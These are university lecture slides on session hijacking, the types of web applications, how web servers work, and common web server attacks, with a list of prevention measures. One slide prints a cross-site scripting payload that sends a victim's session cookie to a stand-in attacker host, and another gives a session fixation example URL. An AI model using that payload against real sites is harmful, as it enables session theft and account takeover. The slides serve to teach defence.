CritiX

Security Operations and Assurance

Alireza Esfahani, Lecturer in Cyber Security

BSc, MSc, PhD, PG Cert, FHEA, MIEEE, MECSO

University of West London

1
Week 11

Session Hijacking

CP70044E @2023 2
Today’s agenda

• Understand session hijacking concepts

• Review session hijacking countermeasures
• Review Web Application and Web Server concepts

CP70044E @2023 3
 Recap-The 3-Way Handshake
• If the attacker can anticipate the next sequence and ACK number that Bob
will send, he/she will spoof Bob’s address and start communication with
the server.

CP70044E @2023
https://sectigostore.com/blog/session-hijacking-attacks-session-hijacking-explained/ 4
 What is Session?
• Sessions act as a series of interactions between two devices.

• Application developers need to create a way to track the state between

multiple connections from the same user, rather than asking them to re-
authenticate between each click in a web application.
• For example, when you login to an application, a session is created on the
server. This maintains the state and is referenced during any future
requests you make.

CP70044E @2023
https://sectigostore.com/blog/session-hijacking-attacks-session-hijacking-explained/ 5
 Session- Features
• Sessions remain active while the user remains logged in to the system.
• The session is destroyed when you log out, or after a set period of
inactivity on your end. At that point, the user’s data is deleted from the
allocated memory space.
• Session IDs are a key part of this process. They’re a string, usually random
and alpha-numeric.
• Depending on how the website is coded, you can find them in cookies,
URLs, and hidden fields of websites.

• A URL containing a session ID might look like:

www.mywebsite.com/view/99D5953G6027693
• On an HTML page, a session ID may be stored as a hidden field:

<input type=”hidden” name=”sessionID” value=”19D5Y3B”>

CP70044E @2023 6
https://sectigostore.com/blog/session-hijacking-attacks-session-hijacking-explained/
Session- Challenge

• While Session IDs are quite useful, there are also potential security
problems associated with their use.
• If someone gets your session ID, they can essentially log in to your account
on that website.
• One common issue is that many sites generate session IDs based on
predictable variables like the current time or the user’s IP address, which
makes them easy for an attacker to determine.
• Another issue is that without SSL/TLS, they are transmitted in the open
and are susceptible to eavesdropping and can leave you exposed to session
hijacking. CP70044E @2023 7
 What is Session Hijacking?
• Session hijacking refers to an attack
where an attacker takes over a valid
TCP communication session between
two computers

• Since most authentication only occurs

at the start of a TCP session, this
allows the attacker to gain access to a
machine

• Attackers can sniff all the traffic from

the established TCP sessions and
perform identity theft, information
theft, fraud, etc.
https://sectigostore.com/blog/session-hijacking-attacks-session-hijacking-explained/
• The attacker steals a valid session
and uses it to authenticate himself
with the server CP70044E @2023 8
Common Methods of Session Hijacking

Brute Session
Force Sniffing

Cross-Site Session
Scripting Fixation

Malware

CP70044E @2023 9
 Session Fixation
• This type of attack relies on website accepting session IDs from URLs,
most often via phishing attempts.
• For instance, an attacker emails a link to a targeted user that contains a
particular session ID. When the user clicks the link and logs in to the
website, the attacker will know what session ID that is being used.
• It can then be used to hijack the session.

https://sectigostore.com/blog/session-hijacking-attacks-session-hijacking-explained/

CP70044E @2023 10
 Session Fixation- Example
• An attacker determines that http://www.unsafewebsite.com/ accepts
any session identifier and has no security validation.
• The attacker sends the victim a phishing email, saying “Hello Mark,
check out this new account feature from our bank.” The link directs the
victim to http://unsafewebsite.com/login?SID=123456.
• In this case, the attacker is attempting to fixate the session ID to
123456.
• The victim clicks on the link and the regular login screen pops up. The
victim logs on as normal.
• The attacker can now visit http://unsafewebsite.com/?SID=123456 and
have full access to the victim’s account.

CP70044E @2023 11
 Session Sniffing
• When a hacker employs a packet sniffer, such as Wireshark, to intercept
and log packets as they flow across a network connection.
• Session cookies are part of this traffic, and session sniffing allows an
attacker to find and steal them.
• A common vulnerability that leaves a site open to session sniffing is
when SSL/TLS encryption is only used on login pages.
• Public Wi-Fi networks are especially vulnerable to this type of session
hijacking attack.

https://sectigostore.com/blog/session-hijacking-attacks-session-hijacking-explained/

CP70044E @2023 12
 Cross-Site Scripting
• A cross-site scripting (XSS) attack fools http://www.yourbankswebsite.com/search?
the user’s machine into executing
malicious code.
• When the script runs, it lets the
hacker steal the cookie.
• Server or application vulnerabilities
are exploited to inject client-side
scripts (usually JavaScript) into
webpages, leading the browser to
execute the code when it loads the
compromised page.
• An example of a cross-site scripting
attack to execute session hijacking
would be when an attacker sends out
emails with a special link to a known,
trusted website. CP70044E @2023
<script>location.href=’http://www.evilatta
cker.com/hijacker.php?cookie=’+document.
cookie;</script>
• Here the document.cookie command
would read the current session cookie and
send it to the attacker via the
location.href command.
• This is a simplified example, and in a real-
world attack the link would most likely
employ character encoding and/or URL
shortening to hide the suspicious portions
of the link.
13
 Malware
• Hackers design the malware to perform packet sniffing and set it to
specifically look for session cookies. When it finds one, it then steals it
and sends it to the attacker. The malware is basically carrying out an
automated session sniffing attack on the user.

• Another more direct method of stealing session IDs is to gain access to

the user’s machine, whether via malware or by directly connecting to it
locally or remotely. Then, the attacker can navigate to the temporary
local storage folder of the browser, or “cookie jar”, and whichever
cookie they want.

CP70044E @2023 14
 Brute Force
• A hacker can attempt to determine the session ID on their own.

• First, they can try to guess the session ID. This can be successful if the
session ID is based on an easily predictable variable such as the user’s
IP address or the current time or date.

• A brute force attack can also be used, in which an attacker attempts to

use various session IDs over and over again from a set list. This is really
only a feasible means of session hijacking if the session ID format
consists of a relatively short number of characters.

CP70044E @2023 15
How to Prevent Session Hijacking
• Use HTTPS On Your Entire Site
• Use the Secure Cookie Flag
• Use Long and Random Session IDs
• Regenerate the Session ID After Login
• Change the Cookie Value
• Log Out When You’re Done
• Use Anti-Malware
• Do Not Accept Session IDs from GET/POST
Variables
• Destroy Suspicious Referrers

CP70044E @2023 16
WEB APPLICATIONS and WEB SERVER
CONCEPTS

CP70044E @2023 17
Web Application Most people often confuse web applications and websites.

• A web application is a type of software designed to operate within a web

browser.
• Businesses have to exchange information and deliver services remotely.
• To achieve this efficiently and securely, businesses leverage web applications
to establish convenient and secure connections with their customers.

https://www.shno.co/blog/web-application-examples

CP70044E @2023 18
Types of web applications
Static web
application

Dynamic
Progressive
web
Web Apps
application

Types of web
applications

Single-page
Portal Web
web
Apps
application

Animated
web
applications

CP70044E @2023 19
Static web application
• Static web apps appear to the clients the same
as they are stored on the server.
• Languages: HTML, JavaScript, etc.
• Animated objects, GIFs, videos.
• however, it is hard to make updates.

Example:
Professional
portfolios,
digital resumes.
https://www.gurutechnolabs.com/types-of-web-applications/

CP70044E @2023 20
Dynamic web application https://www.gurutechnolabs.com/types-of-web-applications/

• It is one of the best web

application types as they fetch
data in real-time based on the
users’ requests.
• It requires a database to store
data, and its content is
continuously updated every time
users access it.
• Languages: Node.js, Laravel, Ruby
on Rails, jQuery, HTML, CSS, PHP,
ASP.NET, Perl, Python, etc. Example:
YouTube,
Netflix, Hubspot

CP70044E @2023 21
Single-Page web application
• Single-page apps make it easy for users to use a webpage smoothly.
• This happens because the webpage can quickly send and receive small
amounts of data, making everything work well together.
• Languages: HTML, CSS, PHP, ASP.NET, Perl, Python, etc.
https://www.gurutechnolabs.com/types-of-web-applications/

Example:
Gmail,
Paypal

CP70044E @2023 22
Multi-Page web application
• They are websites that consist of multiple interconnected pages, each
serving a specific purpose or presenting distinct content.
• Unlike single-page applications (SPAs), which load content dynamically
without full-page refreshes, multi-page applications navigate between
distinct URLs.

Example:
Amazon,
eBay

CP70044E @2023 23
https://www.gurutechnolabs.com/types-of-web-applications/
Animated web application
• Animated web applications are closely connected with FLASH
technology. By creating these types of web apps, you can represent
content by using various animated effects.

https://www.gurutechnolabs.com/types-of-web-applications/

CP70044E @2023 24
Portal web application
• It is one of its types of web apps in which various sections or categories
are accessible on the home page. Here, this page consists of various
details such as chats, emails, forums, user registration, etc.

https://www.gurutechnolabs.com/types-of-web-applications/

CP70044E @2023 25
Progressive web application
• Enable you to enhance the mobile web experience and provide your
services to users despite slow/bad internet connections.

https://www.gurutechnolabs.com/types-of-web-applications/

CP70044E @2023 26
How Web Applications Work

CP70044E @2023 27
Web Application Architecture

CP70044E @2023 28
Web Servers
• A web server is a computer that hosts web pages, making them
accessible online. When a user loads a site, the web server
will retrieve the relevant files and send them to the browser
so the user can interact with them.
• Web servers are differentiated by:
• Operating system support
• Server-side technologies
• Security models
• Client support
• Development tools

CP70044E @2023 29
 How do Web Servers work?
• When someone wants to load a website, the browser will look for the web server hosting
the site’s files.
• To achieve this, the web browser translates the site’s domain name into an IP address via
the Domain Name System (DNS). If the site is frequently visited, the web browser will
search through its file cache.
• After finding the corresponding web server, the browser sends an HTTP request to
retrieve site content.
• The web server receives and processes the HTTP request through its HTTP server. Once
the HTTP server accepts the request, it will search through the database to obtain the
relevant data.
• Finally, the server returns the files to the web browser and delivers them to users.

https://www.hostinger.co.uk/tutorials/what-is-a-web-server

CP70044E @2023 30
HTTP request/response
• User of client machine types in a URL

client server
(Netscape) (Apache)

http://www.smallco.com/index.html

• Server name is translated to an IP address via D N S

client server
(Netscape) (Apache)

http:// www.smallco.com /index.html

192.22.107.5

CP70044E @2023 31
HTTP request/response
• Client connects to server using IP address and port
number
• NB port 80 is default

client 192.22.107.5 server

(Netscape) port 80 (Apache)

http://www.smallco.com/index.html

192.22.107.5

• Client sends HTTP request to server

client GET index.html HTTP/1.1 server

(Netscape) (Apache)

http://www.smallco.com/index.html

CP70044E @2023 32
Web server basics
• Server determines which file to send

client server
(Netscape) (Apache)

http://www.smallco.com/index.html
"index.html" is really
/etc/httpd/htdocs/index.html

• Server sends response code and the document

HTTP/1.1 200 OK
client Content-type: text/html server
(Netscape) (Apache)
[contents of index.html]

http://www.smallco.com/index.html

CP70044E @2023 33
Web Server Features
• File logging. Log files track any events or activities a web server performs, such as
requests, security, and error logs.
• Authentication. It often involves asking web users to provide a username and password.
• Bandwidth limiting. Bandwidth limiting controls the speed of responses to ensure that a
network can deliver files smoothly.
• Storage space. It refers to the amount of disk space available to store files.
• Load balancing. The purpose of load balancing is to minimize response times and
prevent server overload.
• Uptime guarantee. Server uptime tracks how long a web server remains operational to
process requests and deliver files. It directly impacts a hosted website’s availability. The
industry standard is a 99.9% guarantee.

CP70044E @2023 34
Actors
• There are three types of individuals (actors) who will be interacting with a web
server.

• Concerned with • Concerned with • Interact with the

the safety, the infrastructure web server and
security, and and functioning application as a
functioning of the of the network consumer and
web server from itself as a whole. user of
an operational information.
standpoint.
System Network
End users
Administrator Administrator
CP70044E @2023 35
Web Servers in the Market

Apache
HTTP NGINX
Server

IIS Lighttpd

CP70044E @2023 36
Apache Web Server
• A free and open-source web server used for many operating systems, including
Windows, Linux, and macOS. Apache is one of the most popular choices among
website owners, developers, and hosting providers, with a market share of over
31%.
• The modules supported by Apache include:
• Authentication
• SSL support
• TLS support
• PHP
• HTTP request filtering

CP70044E @2023 37
Internet Information Server (IIS)
• Developed by Microsoft, IIS is widely used in Windows operating
systems. It supports Active Server Pages (ASP), a server-side
scripting technology developed by Microsoft for creating dynamic
and interactive web applications.

• Very similar to Apache, it is flexible, secure, and easy-to- manage web

server for hosting anything on the web.

CP70044E @2023 38
NGINX
• Initially designed only for HTTP web serving, this open-source
software now also serves as a reverse proxy, HTTP load balancer,
and email proxy. NGINX is known for its speed and ability to handle
multiple connections, making it suitable for high-traffic websites.

CP70044E @2023 39
Lighttpd
• A free and open-source web server software known for its fast data
processing with less CPU power. Lighttpd is also popular for its
small memory footprint, allowing the server to handle more
requests while maintaining responsiveness and performance.

CP70044E @2023 40
WEB SERVER ATTACKS

CP70044E @2023 41
DoS/DDoS Attacks
• Attackers may send numerous fake requests to the web
server which results in the web server crash or become
unavailable to the legitimate users.

CP70044E @2023 42
DNS Server Hijacking
• Attacker compromises the D N S server and changes the
D N S settings so that all the request coming toward the
target web server are redirected to their own malicious
server.

CP70044E @2023 43
Man-in-the-Middle/Sniffing Attack
• MITM attack allows an attacker to access sensitive
information by intercepting and altering communications
between an end-user and web servers.
• Attacker acts as a proxy such that all the communication
between the user and web server passes through him.

CP70044E @2023 44
Phishing Attacks
• Attacker tricks user to submit login details for a website that looks
legitimate, but it redirects it to the malicious website hosted on the
attacker web server.
• It steals the credentials entered and uses them to impersonate the
legitimate user with the website hosted on the legitimate target server.
• Attacker then can perform unauthorised or malicious operation with the
website target server.

CP70044E @2023 45
Summary
• Understanding of Session Hijacking Techniques
• Implementation of Session Hijacking Prevention Measures

CP70044E @2023 46
Thank you very much!

CP70044E @2023 47
See you next year
CP70044E @2023 48